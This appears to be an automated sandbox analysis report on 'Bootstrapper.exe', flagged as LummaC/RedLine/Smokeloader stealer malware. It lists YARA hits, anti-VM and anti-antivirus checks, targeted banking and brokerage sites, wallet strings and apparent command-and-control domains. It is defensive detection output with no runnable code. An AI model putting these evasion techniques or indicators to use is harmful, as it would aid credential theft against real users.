            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49749 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000000.00000002.2339254428.0000000000802000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: C:\Users\user\Desktop\Bootstrapper.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 1900
            Source: Bootstrapper.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000000.00000002.2339254428.0000000000802000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: Bootstrapper.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@1/1
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1036
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\070acd59-ccd5-45ca-8ada-4060a2513ea1Jump to behavior
            Source: Bootstrapper.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Bootstrapper.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Bootstrapper.exe, 00000000.00000003.2221895378.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2233966360.0000000002F2E000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2234096872.0000000002F22000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2221433741.0000000002F30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Bootstrapper.exeVirustotal: Detection: 50%
            Source: Bootstrapper.exeReversingLabs: Detection: 39%
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile read: C:\Users\user\Desktop\Bootstrapper.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Bootstrapper.exe "C:\Users\user\Desktop\Bootstrapper.exe"
            Source: C:\Users\user\Desktop\Bootstrapper.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 1900
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\Bootstrapper.exeUnpacked PE file: 0.2.Bootstrapper.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.joli:W;.yoli:W;.hozuvup:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\Bootstrapper.exeUnpacked PE file: 0.2.Bootstrapper.exe.400000.0.unpack
            Source: Bootstrapper.exeStatic PE information: section name: .joli
            Source: Bootstrapper.exeStatic PE information: section name: .yoli
            Source: Bootstrapper.exeStatic PE information: section name: .hozuvup
            Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_02F06876 push edi; retf 0_3_02F06879
            Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_02F06A94 push ecx; ret 0_3_02F06A9A
            Source: Bootstrapper.exeStatic PE information: section name: .text entropy: 7.412788530968616
            Source: C:\Users\user\Desktop\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\Bootstrapper.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\Desktop\Bootstrapper.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 4976Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: Amcache.hve.4.drBinary or memory string: VMware
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
            Source: Bootstrapper.exe, 00000000.00000002.2339295599.0000000000849000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
            Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: Bootstrapper.exe, 00000000.00000003.2278052852.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218862146.0000000000878000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2267056339.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2289039973.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2339295599.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218781090.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2266368056.0000000000876000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,116
            Source: Bootstrapper.exe, 00000000.00000003.2233342276.0000000002F47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: Amcache.hve.4.drBinary or memory string: vmci.sys
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: Amcache.hve.4.drBinary or memory string: VMware20,1
            Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.4.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
            Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
            Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: Bootstrapper.exe, 00000000.00000003.2233052272.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\Bootstrapper.exeProcess information queried: ProcessInformationJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            LummaC encrypted strings found
            Source: Bootstrapper.exe, 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: finickypwk.lat
            Source: Bootstrapper.exe, 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: shoefeatthe.lat
            Source: Bootstrapper.exe, 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: savorraiykj.lat
            Source: Bootstrapper.exe, 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: kickykiduz.lat
            Source: Bootstrapper.exe, 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: miniatureyu.lat
            Source: Bootstrapper.exe, 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: leggelatez.lat
            Source: Bootstrapper.exe, 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: washyceehsu.lat
            Source: Bootstrapper.exe, 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: bloodyswif.lat
            Source: Bootstrapper.exe, 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: jubbenjusk.biz
            Source: C:\Users\user\Desktop\Bootstrapper.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
            Source: C:\Users\user\Desktop\Bootstrapper.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: Bootstrapper.exe PID: 1036, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
